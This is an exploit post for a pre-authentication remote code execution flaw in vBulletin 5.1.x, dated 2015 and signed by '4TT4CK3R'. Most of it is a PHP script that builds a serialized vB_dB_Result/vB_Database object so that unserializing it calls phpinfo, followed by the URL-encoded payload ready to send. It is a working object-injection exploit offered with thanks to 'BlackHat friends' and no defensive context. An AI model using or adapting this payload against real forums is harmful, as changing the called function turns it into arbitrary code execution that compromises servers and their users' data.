Vbulletin 5.1.X Unserialize Preauth RCE Exploit

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
~# : Exploit Title: Vbulletin 5.1.X Unserialize Preauth RCE Exploit
~# : Date: 2015/11/04
~# : Exploit Author: 4TT4CK3R
~# : Vendor Homepage: http://www.vbulletin.com
~# : Version: 5.1.x
~# : Google Dork : No
~# : Tested on: Kali Linux , Windows 7 , Mozilla Firefox
~# : Build the object !!
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

    php << &#039;eof&#039;
    <?php
    class vB_Database {
               public $functions = array();

               public function __construct()
               {
                       $this->functions[&#039;free_result&#039;] = &#039;phpinfo&#039;;
               }
    }

    class vB_dB_Result {
               protected $db;
               protected $recordset;

               public function __construct()
               {
                       $this->db = new vB_Database();
                       $this->recordset = 1;
               }
        }

    print urlencode(serialize(new vB_dB_Result())) . "n";
    eof
        O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
~# : Discovered by : 4TT4CK3R
~# : Special Thanks : amin0461
~# : Thanks for my BlackHat Friends !!
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]